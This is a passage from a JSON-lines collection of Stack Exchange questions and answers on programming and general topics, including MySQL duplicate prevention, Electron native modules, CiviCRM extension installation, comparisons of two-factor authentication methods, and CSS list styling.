choice for a hash. The issue with hashes is the chance of a hash collision. That is, it is possible that two different text strings will generate the exact same hash. With SHA-256 or larger hashes, that chance is very low indeed.\nIf you work with SHA-256, you need a column defined like this. (32 bytes is the same as 256 bits, of course.)\n<code>text_hash BINARY(32)\n<\/code>\nThen when you go to insert text you can do this.\n<code>INSERT INTO tbl (text, text_hash) VALUES(?, UNHEX(SHA2(?, 256));\n<\/code>\nIf you make your <code>text_hash<\/code> into a unique index you'll have a way of preventing duplicates by throwing an error when trying. Something like this.\n<code> CREATE UNIQUE INDEX no_text_dups_please ON tbl(text_hash);\n<\/code>\nAnswer: Needs : \"[one] column will hold characters (more than 5000 characters) and I don't want any row for this column to be repeated\"\nPRIMARY KEY add a UNIQUE CONSTRAINT on the field(s) specified, but if you don't need to use it as PRIMARY KEY use only UNIQUE. In addition, I would not recommend UNIQUE CONSTRAINT on large text column.\nI would recommend you to check the unicity of your data by making and storing hashs of your texts.\nAnswer: Sure, the Hash is one way. (I think the latest MariaDB has a technique for doing that by magic!) Here's another approach:\nFor many reasons, you should switch from MyISAM to InnoDB, but I will ignore that for this Q&A.\n<code>CREATE TABLE data_table (\n date_time VARCHAR(100),\n message VARCHAR(5500) PRIMARY KEY\n INDEX(message(100))\n) CHARACTER SET utf8mb4 -- since you might get non-English test, including Emoji.\n<\/code>\n(The \"100\" is a tradeoff between speed and space.)\nBut you will have to do an extra test:\n<code>SELECT 1 FROM data_table WHERE message = ?\n<\/code>\nIf you get something back, you have a dup -- take action. Else do an INSERT.\nOops, I do need to insist on InnoDB -- at least if you could have conflicting connections inserting the same message:\n<code>BEGIN;\nSELECT 1 FROM data_table WHERE message = ? FOR UPDATE;\nif ... then handle dup and don't COMMIT\nINSERT INT data_table (date_time, message) VALUES (?, ?);\nCOMMIT;\n<\/code>\nYou might want to hide all that inside a Stored Procedure.\n","meta":{"source":"stackoverflow","title":"Primary key cannot hold more than 767 or 1000 character as primary key","dup_signals":{}},"subset":"stackexchange"} +{"text":"Template completion\n\nQuestion: In version 8, if one evaluates\n<code>test::usage=\"test[x,y]\";\n<\/code>\nthen types <code>test<\/code>, then shift-cmd-k (or shift-ctrl-k), a template appears with placeholders for <code>x<\/code> and <code>y<\/code>. \nIn version 9, this does not work: if I evaluate the same thing, when I type <code>te<\/code>, I am offered the choice to select <code>test<\/code> from the dropdown menu, just like for the built-in functions. If I select <code>test<\/code> and then press shift-cmd, however, I do not get the template (whereas I do get a template for built-in functions if I do this).\nHow do I get the frontend to show a template?\nNote: This has been fixed as of 9.0.1\nComment: I haven't downloaded version 9, but my suspicion would be that they now draw their template information from somewhere else, not `test::usage`. Maybe you can poke around to see if there is something like `test::template`? That's only a wild guess - it's what might make sense if this is actually an enhancement and not a bug.\nComment: I *think* the completion information is stored here: `FileNameJoin[{$InstallationDirectory, \n \"SystemFiles\/Kernel\/TextResources\/English\/FunctionInformation2.m\"}]`. You will need to `Uncompress` the file after importing it as `String`. The *actual* usage messages are also in that directory, stored in `Usage.m`. If you look at most packages, the `::usage` messages are plain text only, but when you load the package, and `?` the symbol, you'll get a nicely formatted usage message with italicized arguments. This comes from `Usage.m`, not from the package file.\nComment: Apparently, I was a little heavy handed with the \"remove all instances of v.9 tag.\" Reverting ...\nComment: @Jens that's a good idea. I can't see anything other than the usual `usage` messages, but maybe I am missing something. Let's see if someone else can find something\nComment: It doesn't work for me with version 9 on Win 7, 64-bit.\nComment: I would also like to know how to make my own InputAliases appear on the autocomplete list...\nComment: So this should also be tagged version-9 bug ...right?\nComment: @MikeHoneychurch yes I think so. Done!\nComment: `FunctionInformation.m` contains syntax colouring info, I think.\nComment: For completeness sake: Related question \u2014 http:\/\/mathematica.stackexchange.com\/q\/19816\/5\nAnswer: To clarify the situation: In Version 9 on Windows and OS X, there is a new Make Template system which supports multiple templates for built-in functions. As part of the new system, unfortunately a bug was introduced which makes it ignore the usage statement for user-defined functions. This bug has been confirmed and we hope to fix it in a future release, though I cannot make any prediction as to when. The Linux front-end does not yet feature this new make-template system due to certain technical obstacles, which means it also does not suffer from the new bug. \nThere also seems to be some confusion as to how to invoke make template in version 9. Here is how it works: the new code assist offers possible completions as you type instead of forcing you to hit Ctrl\/Cmd-k. Now, if you select a completion from the code assist using Enter, Tab, or left click, you will notice that a small down arrow appears, like so: . This down arrow is the collapsed template list. And this point, you can activate Make Template either using Ctrl\/Cmd-Shift-k, or by hitting DownEnter to expand the arrow. Alternatively, if you've typed in a complete symbol, then Ctrl\/Cmd-Shift-k will activate make template even if you haven't selected something from the code assist. Unlike previous version, Make Template does not currently attempt to complete a symbol before opening the template menu.\nComment: It's worth noting that you may specify a popup delay for autocompletion -- so you don't get the popups when you know what function you want but do get them when you're uncertain. Set this on the Mathematica 9 Preferences dialog, Interface tab.\nAnswer: Partial solution for Linux (Ubuntu 12.04, GNOME 3.4.2)\nIn version 8 I can expand it into a template the same way that normal expansion works. In version 9 this seems to work differently. You have to expand (or type) the full function name first and press then Ctrl+Shift+K\n<code>xxyyzz::usage = \"xxyyzz[x,y]\";\n<\/code>\nNow I type \n<code>xx\n<\/code>\npress Ctrl+K and then Enter and I get\n<code>xxyyzz\n<\/code>\nthen I can use Ctrl+Shift+K to do the template expansion. This is still a bug to me though.\nComment: I can get up to he `xxyyzz` part, but after that if I press shift-cmd-k, nothing happens. do you get the `xxyyzz[x, y]` thing? what do you press, the same as in earlier versions? (shift-ctrl-k?)\nComment: This doesn't work for me on OS X.\nComment: Me too, Win 7 x84. I filed a bug report.\nComment: if this bug is confirmed on MMA9, it would be very annoying for me. I get the template working well for my\/standard functions in MMA8. I will get MMA9 later today and we will see.\nComment: @acl After some hours of sleep I tried this again. On Linux-x86-64 this is exactly the way it works.\nComment: OK I see. It would be useful for others on windows and linux to also try; so far it seems that 3 of us find it not working on OS X, 1 found it not working on win8 but could not check in detail, and?\nComment: It would be useful if the people upvoting also wrote a comment saying eg \"yes, it works here too with this OS\" (if that's why they are upvoting)\nComment: This doesn't work for me on Windows 7 64bit.\n","meta":{"source":"mathematica.stackexchange","title":"Template completion","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotting the fundamental diagram of traffic flow\n\nQuestion: I have a traffic simulation and I don't understand how I can plot the fundamental diagram (flow rate vs density). I simulate the traffic as follows:\nI have a matrix that has as many columns as the the road length, and rows as time steps. Every car is represented by 1 in the matrix. I have lists to keep track of the index and speed of a car. I loop over N time steps so that the traffic evolves over time according to some rules.\nI have looked at wikipedia and tried to find something online to help me but no luck so far in understanding it. How do I derive the data in order to plot the fundamental diagram?\nMy nested list where the first index is the position of the car and the second is its speed:\n\ncarIS[[0, 2], [1, 0], [2, 0], [3, 0], [4, 0], [6, 1], [7, 0], [9, 1],\n [10, 0], [11, 0], [12, 0], [13, 0], [16, 2], [19, 0], [20, 0], [22,\n 1], [24, 0], [26, 1], [28, 0], [30, 1], [31, 0], [32, 0], [33, 0],\n [34, 0], [35, 0], [36, 0], [39, 2], [40, 0], [41, 0], [42, 0], [43,\n 0], [44, 0], [45, 0], [46, 0], [47, 0]]\n\nThis list is produced with every time step. What should I do in order to generate the fundamental plot?\nComment: Is it a question of how you technically display the plots or how you derive the data for the plots? Please be more precise.\nComment: @JensH\u00f6pken I have a problem with deriving the data for the plots\nComment: If you could give an example for the data, that would be of great help as well.\nComment: @JensH\u00f6pken I have updated my question. I have seen the wikipedia page but I still don't understand it\nComment: As long as you don't know what data you have stored inside your list, you won't be able to plot anything. Understand the problem first, go back the literature and get a solid understanding of what you have simulated. You see where I am going with this?\nAnswer: If by fundamental plot of traffic flow you mean this diagram: \nYou can create these easily using Matplotlib.\nComment: Yes that is the one! I have seen this page but I still don't get what I should do\n","meta":{"source":"stackoverflow","title":"Plotting the fundamental diagram of traffic flow","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why do OpenGL methods not return anything?\n\nQuestion: This is just out of curiosity. I couldn't help but noticing that none of the OpenGL methods return anything, even though some of the methods would seem to be more typically implemented with a return.\nFor example, <code>glGenBuffers<\/code> has two parameters, the number of buffers you want to generate, and variable you want to store them in. However, I would think that most people would code it as a method that only takes one parameter, the number of buffers you would like to create, and return those buffer(s). Is this for speed reasons? Or perhaps some other antiquitous reason?\nComment: Well, there *are* functions that return values, that fit into a primitive variable. glCreateShader and glCreateProgram.\nAnswer: In C, it is hard to return an array of anything without introducing dynamic memory allocation.\nSo to \"return\" multiple names from <code>glGenBuffers (...)<\/code>, the easiest solution is to pass a pointer to an array and have the API call store the generated names in the pre-allocated array.\nComment: Not only that, it's for portability. If it returned an array of dynamically allocated memory, that would add a dependence on the C standard library and would also require the user to free that memory. By never returning memory a GL implementation allocates dynamically, those issues are completely avoided.\nComment: Actually, it is the only sane way to do so. I would literally hate library that allocates memory when it really shouldn't, and doesn't provide a way to avoid it.\nComment: @keltar now a reason to hate the library is the statefulness of it (binding buffers before using them), I would vastly prefer the EXT_direct_state_access extension for that\nComment: @ratchetfreak I wasn't talking specifically about GL, but I'm still ok with that. Anyway, isn't 4.5 allows direct state access everywhere?\nComment: How about [glGetShaderiv](https:\/\/www.khronos.org\/registry\/OpenGL-Refpages\/gl4\/html\/glGetShader.xhtml), which only returns a `GLint`?\n","meta":{"source":"stackoverflow","title":"Why do OpenGL methods not return anything?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Node Electron Require issues with SQLAnywhere - Error: Could not load modules\n\nQuestion: I'm new to Electron and am having issues using the sqlanywhere package with it.\nI'm doing a very basic test, and sqlanywhere is throwing an error immediately when it is trying to load its drivers. Note that this works fine until I involve Electron in this application.\nHere is my sample code:\n<code>const sqlanywhere = require('sqlanywhere');\nconst url = require('url');\nconst path = require('path');\nconst { app, BrowserWindow, Menu, Tray, ipcMain } = require('electron');\n\nlet conn = sqlanywhere.createConnection();\n\nvar conn_params = {\n Host : 'localhost:2638',\n UserId : 'user',\n Password: 'password',\n ConnectionPool: 'YES(MaxCached=10)'\n};\n\nconn.connect(conn_params, function(err) {\n\n if (err) throw err; \n\n conn.exec('SELECT * from mytable', function (err, result) { \n if (err) throw err; \n console.log(result[0]); \n conn.disconnect();\n })\n});\n\nlet mainWindow;\n\n app.on('ready', () => {\n\n console.log(\"Started...\");\n\n \/\/ Create Window\n mainWindow = new BrowserWindow({\n width: 200,\n height: 200 \n });\n\n \/\/ Load HTML file into Window\n mainWindow.loadURL(url.format({\n pathname: path.join(__dirname, 'mainWindow.html'),\n protocol: 'file:',\n slashes: true\n })); \n\n});\n<\/code>\nThe error thrown is:\n\"Uncaught Exception: Error: Could not load modules for Platform: 'win32', Process Arch: 'x64', and Version: 'v7.9.0\"\nIt seems to me that the way Electron is handling the 'require' statements in the sqlanywhere package is causing the problem. The index.js of sqlanywhere is:\n<code> \/\/ ***************************************************************************\n \/\/ Copyright (c) 2017 SAP SE or an SAP affiliate company. All rights reserved.\n \/\/ ***************************************************************************\n var db = null;\n var driver_file = \"sqlanywhere\"\n\n var v = process.version;\n var match = v.match( 'v([0-9]+)\\.([0-9]+)\\.[0-9]+' );\n driver_file += '_v' + match[1];\n if( match[1]+0 == 0 ) {\n driver_file += '_' + match[2];\n }\n\n try {\n if( process.arch == \"x64\" ) {\n db = require( \".\/..\/bin64\/\" + driver_file );\n\n } else if( process.arch == \"ia32\" ) {\n db = require( \".\/..\/bin32\/\" + driver_file );\n\n } else {\n throw new Error( \"Platform Not Supported\" );\n }\n } catch( err ) {\n try {\n \/\/ Try finding natively compiled binaries\n console.log(\"Error thrown\"); \/\/ added by me\n console.log(\"DB: \" + db); \/\/ db is null\n db = require( \".\/..\/build\/Release\/sqlanywhere.node\" ); \n } catch( err ) {\n throw new Error( \"Could not load modules for Platform: '\" + \n process.platform + \"', Process Arch: '\" + process.arch +\n \"', and Version: '\" + process.version +\"'\" ); \n }\n }\n module.exports = db;\n<\/code>\nI've added the two console.log statements above to confirm the catch block is being executed, and that db is still null at this point, when it should have loaded the x64 driver. Again, this works until Electron is involved.\nIt seems Electron may be having issues with\n<code>db = require( \".\/..\/bin64\/\" + driver_file );<\/code> \nIf anyone could offer any insight I would be forever appreciative!\nThanks\nAnswer: I assume module you are try to load contains native module. Native module requires version matching between node.js process to compiled binaries, meaning if node.js version does not match between your node installation to Electron, module won't be able to loaded. You could match those specific version between, or use https:\/\/github.com\/electron\/electron-rebuild to generate correct binaries.\nComment: Thanks, I was able to use electron-rebuild to resolve this\n","meta":{"source":"stackoverflow","title":"Node Electron Require issues with SQLAnywhere - Error: Could not load modules","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to produce struct addrinfo from struct sockaddr?\n\nQuestion: I have a struct sockaddr and need to make a struct addrinfo (specifically that, because that's what some other API wants). The IP address may be IPv4 or IPv6. What's the best way to handle that?\nAnswer: From man 3 getaddrinfo,\n<code>struct addrinfo {\n int ai_flags;\n int ai_family;\n int ai_socktype;\n int ai_protocol;\n size_t ai_addrlen;\n struct sockaddr *ai_addr;\n char *ai_canonname;\n struct addrinfo *ai_next;\n};\n<\/code>\nA <code>struct addrinfo<\/code> contains more information than just a <code>struct sockaddr<\/code> does. Given a <code>struct sockaddr_in<\/code>, you can have some of this information (<code>.ai_family = AF_INET, .ai_addrlen = sizeof(struct sockaddr_in)<\/code>). Whether this is sufficient depends on what the other API is looking for.\nComment: Yes, creating a new addrinfo, putting the sockaddr in *ai_addr and filling the other fields with reasonable values seem the way to go.\n","meta":{"source":"stackoverflow","title":"How to produce struct addrinfo from struct sockaddr?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can we install civicrm extension which is not available for drupal\n\nQuestion: I want to add civi hr extension to drupal. But is not available in drupal. \nAnswer: You need to first get into the extension directory, and download the extension directly. Then you can install the extension from Manage Extension Page.\n<code>wget https:\/\/github.com\/civicrm\/civihr\/archive\/1.3.0.zip\nunzip 1.3.0.zip\nmv civihr-1.3.0 civihr\n<\/code>\nYou can now move to <code>Administer>System Settings>Manage Extensions<\/code> Install CiviHR and you are good to go.\nThis link can help you further.\n","meta":{"source":"civicrm.stackexchange","title":"How can we install civicrm extension which is not available for drupal","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set passed value in my ActionResult\n\nQuestion: I have two independent classes that model my tables. First when a new user is created, the user does not have a record in the certificate tables. So in the view for the certificates I have added a button to add certificates details for this new user. \n This is my code for the user view: I omitted the paging\/search and filter code to make it simple\n<code>public ActionResult Index()\nvar recipients = from s in db.User\n select s;\n return View(recipients.ToList());\n<\/code>\nThis is the details view showing related data:\n<code> public ViewResult Details(int id)\n {\n\n var certificateDetails = db.Certificate.Where(p => p.ID == id);\n return View(certificateDetails);\n }\n<\/code>\nAdding a new user means also adding a new certificates details. I want when a user clicks details for the a particular user if those details aint around to be redirected to a create certificate view with both User.ID and CertificateID set. In fact CertificateID is AI but ID from User is foreign key. \nI would have used Fluent API but am not good with it either so have to handle this seemingly small challenge in code. \nAnswer: If I understand your question correctly, you want it so that when you view Details(), if the certificate details don't exist, then redirect to a page to create them?\nJust check whether or not the entity exists. If it doesn't, return a RedirectToAction() and pass whatever data you need in the route data collection. \n<code>public ViewResult Details(int id)\n{\n var certificateDetails = db.Certificate.FirstOrDefault(p => p.ID == id);\n\n if (certificateDetails == null)\n return RedirectToAction(\"Create\", \"Certificate\", new { userId = id });\n\n return View(certificateDetails);\n}\n<\/code>\nYou'll also need to create a Certificate controller with a Create() action. \nComment: Does this answer your question? If you have the Certificate controller, then all you need to do is redirect to it. Also you should accept some of your old questions, you'll get a better response rate.\nComment: SingleOrDefault() just returns a single object matching the criteria, or null if it doesn't exist. If more than one object matches the criteria, it throws an exception. You can change it to any database query you want. The problem with just calling Where() is it doesn't actually execute the query. So .Single(u => u.Id == id) is analogous to .Where(u => u.Id == id).Single();\nComment: I have Certificate controller, will edit my question to reflect that. I am using POCO classes i.e code first.\nComment: Thanks for the added suggestion and answer. That change from where to SingleOrDefault has created problems in my sorting code when the if statement is false. it can not accept OrderBy.\nComment: How then do I let the else statement have a list not a single object?\nComment: whats happening is my view is throwing an exception when the table is not null saying Sequence contains more than one element.\nComment: It's because Single() throws an exception if there's more than one element that matches. You need to change it to ToList() if you want to load a collection. The Single() stuff isn't related to the question you asked, it was just what I used in my answer. You can change it to whatever query you want.\n","meta":{"source":"stackoverflow","title":"Set passed value in my ActionResult","dup_signals":{}},"subset":"stackexchange"} +{"text":"For 2FA, is one method better (more secure) than another?\n\nQuestion: There are a variety of options available for 2FA - LastPass, for example, offers all of the following options:\n\nLastPass Authenticator\nDuo Security Authentication\nGoogle Authenticator\nYubikey Multifactor Authentication\nRSA SecurID\nSesame Multifactor Authentication\n\n... and so on. I've heard of other 2FA options too - SMS, SmartCard, TOTP (not sure exactly what that is), and so on.\nAs near as I can tell, it seems like the main distinction is between hardware-based solutions (e.g., Yubikey) and software-based solutions (e.g., the various 'Authenticator' smartphone apps).\nFrom an information security POV, does one of these options offer a higher level of security? Put another way, for the average user, what's the most secure form of 2FA available?\nComment: There is no universal 'more secure', only what meets your requirements and threats. SMS is really weak, but stronger than passwords. There are attacks against hardware tokens and they are expensive. If you have consultants, then reusable licenses and software tokens might be better. If you need to meet PCI requirements, you will need 2FA for non-console admin access, etc. etc.\nComment: @nowen - I'm a graduate student in computer engineering who's had his data stolen in the OPM hack (and possibly a couple others). So I guess by \"average user\", I mean \"me\" haha. It seems you're saying that hardware tokens are generally a bit more secure for personal use? Or am I reading into that too closely and the first sentence (\"there is no universal 'more secure'\") is most important?\nComment: lol, no I guess you are not. You in particular need to worry about SE attacks that might use your personal data in some way. I do not think anything is 'more secure' or 'less secure' except in relation to your goals and environment. If you are most worried about the lost data about you, then you should avoid services that rely on it for password resets or initial validation. You sound savvy enough to avoid malware on your device, so tokens there are fine. However, SMS relies on the security of the carrier and not just you, so that's a different equation.\nComment: TOTP is an algorithm that is used by e.g. the Google Authenticator. HOTP can be used by Yubikey. https:\/\/www.ietf.org\/rfc\/rfc4226.txt, https:\/\/tools.ietf.org\/html\/rfc6238. RSA SecurID uses a proprietary algorithm.\nAnswer: Generally speaking, all of these security products are solid enough for casual end-users. When it comes to end-users, most of the vulnerabilities come from the way the person uses it, not from weakness in the method itself. For example, do you leave your RSA SecureID card where your kids have easy access to it? If you use a code generating app, then does your phone have a strong password lock on it?\nAs mentioned by @SteffenUllrich, if you happen to get spyware on your mobile device with root access - which is more common than you might expect (see StageFright and drive-by downloads) then your SMS, email, and maybe even app based methods could be compromised.\nI think that if you've careful about how you use it, and have good security practices on your devices, then any of these methods are fine for the average end-user worried about drive-by (ie non-targeted) password cracking from database leaks. If you want to go the extra mile and sacrifice some convenience, then I suppose the ordering would be <code>SMS\/email < app\/OTP\/TOTP < hardware token<\/code>.\n\nNow, if you're not an \"average\" end-user, but a high-value target that nation state actors are trying to break into, then everything changes. For example, if you've made enemies with the US government's NSA then they can sniff any code sent to you over SMS or email, and can likely sniff the packets of the first-time setup of the Google Authenticator app (or, you know, just ask Google for the code). In this case, hardware tokens really are king because they are entirely \"out of band\" (ie nothing sensitive ever crosses the internet).\n\nJust for completeness, here is a copy of the tag wiki from the multi-factor tag (which I wrote).\nYou can break 2FA methods into three broad categories:\n\nSomething you know - information, like a password, or your mother's maiden name, or a public key stored in a key file.\nSomething you have - usually a physical object like the phone that can receive SMS at your number, or a One-Time-Password (OTP) token or public-key enabled smart card \/ USB stick:\n\nSomething you are: aka \"biometric\" like fingerprints, iris, voice, typing rhythm, etc.\n\nThe reason for splitting auth methods into these categories is that each one requires a very different kind of theft in order for a hacker to acquire it.\nIf you are required to provide a proof of identity from more than one of the above catogories, then it is properly \"Two Factor Authentication\", or \"Multi-Factor Authentication\". If you are providing multiple items from the same category, then it's called \"Multi-Step Authentication\", which is obviously weaker than multi-factor.\nComment: I think there is a major difference between specialized hardware tokens and apps on the smartphone or SMS. In the latter case it is often sufficient that an attacker manages to install a privileged application to get to the secrets or to read the SMS. And because of insufficient security of the phones such installations might be done [using a MMS](http:\/\/www.howtogeek.com\/225834\/stagefright-what-you-need-to-know-and-how-to-protect-yourself\/), a [drive by download](https:\/\/blog.fortinet.com\/2014\/02\/16\/new-drive-by-download-android-malware) or similar.\nComment: @SteffenUllrich That's a good point, I'll edit.\nAnswer: When thinking of two factor authentication or multi factor authentication you have to take a look at the 2nd factor - in case of possession.\n\nThe possession factor needs to be unique\nYou need to realize, when it was stolen \/ compromized\nYou need to be able to revoke this and reenroll it. (bad for biometrics)\n\nAuthentication devices\nYou can differentiate authentication devices like\nhardware <--> software\nseedable <--> not seedable\nHardware devices will store the secret key, which in fact in the incarnation of the possession factor in hardware. The secret key can \"not\" be stolen without you realizing it.\nBut You also have to take care about the distribution process. non seedable hardware will come with a seed file on a disc. If the vendor keeps a copy of the seeds the hardware tokens may be compromized, without you knowing it.\nseedable tokens are a great way to avoid this. But note: A google authenticator is also a \"seedable\" token. You yourself are generating the secret key. But the storage of this secret key is not that good, as we are dealing with a software token...\nAuthentication backend\nAlso you need to take a look at the authentication backend.\nYou need to make up your mind if you are fine with a hosted service. So you need to trust the provider. If you are running on premise, you may choose between closed source and open source solutions. Pick this one, which you feel more secure with. \nDisclaimer: I am involved with privacyIDEA, which is an open source on premise authentication solution which supports all mentioned token types above.\nBottom line\nI wanted to point out, that it is difficult to define a security level ranking. As the security is... ...multi dimensional and depends on a lot of factors to take into account. \nIf you decide for a certain technology or solution. Write down your thoughts and the decision making process, so that you know which side effects or drawbacks you are willing to take. Security is never 100%. And it is always good to know the weeknesses or limitations of the system you are using.\n","meta":{"source":"security.stackexchange","title":"For 2FA, is one method better (more secure) than another?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why has the Congo ended up French-speaking but not Flemish-speaking?\n\nQuestion: Why is there hardly any Flemish linguistic heritage in the former Belgian colonies, at least at the institutional level?\nEDIT (Evidence of prior research): Neither the Democratic Republic of the Congo nor Rwanda have Dutch as their official or national language, contrary to French.\nComment: I'm reluctant to close a question with an answer.\nComment: @MarkC.Wallace I know what you mean. On the other hand, I've fielded so many \"*Why was my question closed when [another equally off-topic question] wasn't?*\" type questions that I also feel that if it's off-topic it should be closed, whether it has an answer or not (probably a variant of 'broken-window theory'). I'm always conflicted in these cases.\nComment: I saw a documentary that has a good explanation. French was the official language. Anyone had to speak and understand it. Amongst themselves - mainly the Flemish officers, of course - Flemish was used to keep things secret from the general population. So when Congolese heard Flemish, they knew something bad was going to happen. They hated French, but even more Flemish.\nComment: @sempaiscuba I would be willing to agree that the question is \"too basic\" in the sense that a simple reference to the answer could be found (albeit a relatively obscure one for the casual history afficionado). That said, I quite disagree that it's off-topic. If asking about the linguistic heritage of Belgian colonization in the Congo is off-topic, then what isn't?\nComment: Besides, just because a question can fit as one-liner, doesn't make it \"too basic\". If anything, I'd say it makes it more elegant.\nComment: @Tfovid The question is \"too basic\" because typing the keywords from your question into Google returns the answer (in my case, the article cited by Brian Z appears on the first page of results returned). As our [Help Centre](https:\/\/history.stackexchange.com\/help\/on-topic) makes clear, \"*Questions answered by a simple Google search or to be found in a Wikipedia page*\" are generally off-topic on History:SE\nAnswer: This article, \"A Brief History of Dutch in Africa\", explains:\n\nFrom the start, Stanley worked with officers and agents of a variety of nationalities, many of them Belgians. These Belgian nationals were of either Dutch-speaking or French-speaking origin. As at that time French was still the only language for all formal communication in Belgium, the Belgian officers and agents in the Congo quite naturally used French as the official language among them and for writing. [...] In sum, the arrival of Flemings in the Congo in the late 1870 and 1880s, marked the beginning of a structural presence of Dutch in Central Africa, albeit always under the hegemony of French as official language.\nComment: Also consider that some neighbors (including, right across the river from Kinshasa, Congo-Brazzaville, who also had to share the Congo river) were french colonies - no nearby dutch speakers. And this is quite analogous, albeit in minor scale, as \"why is there no large catalan, basque or galician linguistic heritage in Spanish America\"\nComment: At least in the beginning until 1908, the Congo Free State was not a Belgian colony but personal property of Leopold II who, like most Monarchs in Europe, primarily conversed in French.\nComment: Alright, so the explanation lies \"upstream\", namely in the fact that French was the main language of Belgium.\nComment: Until displaced by English around WWII, French was perhaps the primary language of international diplomacy and much culture, and (at least until the 1970s) was perhaps the most widely taught second language in English-speaking countries. So learning French would have utilitarian benefit, unlike Flemish or Dutch.\n","meta":{"source":"history.stackexchange","title":"Why has the Congo ended up French-speaking but not Flemish-speaking?","dup_signals":{}},"subset":"stackexchange"} +{"text":".NET equivalent of java.awt.color.ColorSpace\n\nQuestion: I'm trying to port a library from Java to .NET that makes heavy use of the java.awt.color namespace. What is the .NET equivalent to this?\nComment: need more context to this question. Obviously you've looked into system.Drawing.Color and you haven't found what you want there. What are you looking for.\nComment: I think you should provide an example of the java code you need to port, this would help determine the best approach.\nAnswer: I'm not entirely familiar with the Java namespace, but maybe you're looking for System.Drawing.Color?\nEDIT: \nObviously Java and ICC are not my game, but I figured I'd still try to help out. There are several references to ICC in the documentation for System.Windows.Media.\nColor Structure:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.color.aspx\nColor Context:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.colorcontext.aspx\nMaybe this is a sufficient starting point to find the functionality you are seeking.\nComment: To quote the package summary: \"Provides classes for color spaces. It contains an implementation of a color space based on the International Color Consortium (ICC) Profile Format Specification, Version 3.4, August 15, 1997. It also contains color profiles based on the ICC Profile Format Specification.\"\nComment: ColorContext represents the ICC or ICM profile, see also pixel formats http:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.pixelformats.aspx\nAnswer: The java.awt.color namespace seems to only concern itself with color spaces. There's no such concept in .Net as a color space. Everything in .Net is based on RGB (RGB color space) except perhaps some new XAML attributes in WPF. The java.awt.color namespace includes considerations for such ideas as CMYK (Cyan, Magenta, Yellow bLack) which is used in printing applications only.\nMy guess is that unless you are indeed working on an application that sends CMYK color data to a printer then you don't need to worry about it. The colors in .Net are based around RGB or aRGB (even the gray scale. The RGB values are simply all equal so RGB(128,128,128=MediumGray)\nAnswer: The SystemColors class provides access to system brushes and colors, such as ControlBrush, ControlBrushKey, and DesktopBrush. A system brush is a SolidColorBrush object that paints an area with the specified system color. A system brush always produces a solid fill; it can't be used to create a gradient.\nThe System.Drawing namespace has brushes, images, converters, system colours, regions and pretty much all the basics for drawing on windows. I think this works closely with GDI+.\nIf you have any specif classes you need to map to or requirements add a comment and I'll see what I can do.\n","meta":{"source":"stackoverflow","title":".NET equivalent of java.awt.color.ColorSpace","dup_signals":{}},"subset":"stackexchange"} +{"text":"Strange behaviour using OpenLayers + Mapguide Layer\n\nQuestion: I'm trying to use a Mapguide Layer with OpenLayers.\nFirst of all, I've used code taken from the official example page.\nAll works fine, the map is showed and I can zoom it.\nBut, if I move the map (pan), the map recenter automatically on the initial center.\nI've used exactly the same code as the example page mentioned above. \nIt's something missed with my mapguide?\nAnswer: I've found the problem.\nBy default, OpenLayers doesn't had support to EPSG:3003.\nDespite this, when I do { projection: new OpenLayers.Projection(\"EPSG:3003\") } in the code, no errors raise. \nI've fixed this adding proj4js library and definition for EPSG:3003.\nHope this help someone else :)\nAnswer: This URL below is working (openlayer + mapguide).\nhttp:\/\/openlayers.org\/en\/v3.9.0\/examples\/mapguide-untiled.html?q=mapguide\n","meta":{"source":"stackoverflow","title":"Strange behaviour using OpenLayers + Mapguide Layer","dup_signals":{}},"subset":"stackexchange"} +{"text":"Reset HTML List Depth To Root Level (for bullets)\n\nQuestion: As an example, I would like to set level 4 of the list in this fiddle (code below) to the root level. This would mean the bullets for level 4 would look like level 1, level 5 would look like level 2 and level 6 would look like level 3. This would need to happen without manually overriding the bullets per item because different browsers have different bullet styles.\n<code><ul>\n <li>level 1 item<\/li>\n <li>level 1 item\n <ul>\n <li>level 2 item<\/li>\n <li>level 2 item\n <ul>\n <li>level 3 item<\/li>\n <li>level 3 item\n <ul>\n <li>level 4 item<\/li>\n <li>level 4 item\n <ul>\n <li>level 5 item<\/li>\n <li>level 5 item\n <ul>\n <li>level 6 item<\/li>\n <li>level 6 item<\/li>\n <li>level 6 item<\/li>\n <\/ul>\n <\/li>\n <li>level 5 item<\/li>\n <\/ul>\n <\/li>\n <li>level 4 item<\/li>\n <\/ul>\n <\/li>\n <li>level 3 item<\/li>\n <\/ul>\n <\/li>\n <li>level 2 item<\/li>\n <\/ul>\n <\/li>\n <li>level 1 item<\/li>\n<\/ul>\n<\/code>\nComment: There is no way (AFAIK) to \"re-start\" the multi-level styling. You can set the 4th level to `list-style:initial` but this will affect all nested `ul` as well - https:\/\/jsfiddle.net\/83tbzu2j\/2\/ Of course, if you can figure out a way to **not** affect the deeper levels you may have something....but I don't think so. You might be better off with CSS Counters.\nComment: @Paulie_D `list-style: initial` doesn't appear to do anything in Chrome in relation to bullet styles.\nComment: Did in my version. It switches from a square bullet to a round one.\nComment: We need a `:nth-nested-child` selector. That would be awesome! :) But I think Paulie_D is right. There is no CSS way to do this. If you want, I give you a jQuery solution.\nComment: @Paulie_D I see, was on a machine earlier with lower resolution and thought they were the same.\nComment: @Huelfe I'm trying really hard to avoid any JS in this.\nAnswer: It seems all browsers go disc-circle-square so I managed to get this with a bit of <code>CSS<\/code> and a class (applies automatically to <code><ul><\/code> elements inside an <code><ol><\/code> element but not otherwise.) Fiddle here and <code>CSS<\/code> below:\n<code>ol > li > ul > li > ul > li > ul {\n list-style-type: square;\n}\nul.initial > li > ul > li > ul {\n list-style-type: square;\n}\nol > li > ul > li > ul {\n list-style-type: circle;\n}\nul.initial > li > ul {\n list-style-type: circle;\n}\nol > li > ul {\n list-style: initial;\n}\nul.initial {\n list-style: initial;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Reset HTML List Depth To Root Level (for bullets)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Allowing access to my server's UDP ports when the server is connected to OpenVPN\n\nQuestion: I've recently bought some cheap vps, and would like to open some ports, I already done that on server with ufw. btw 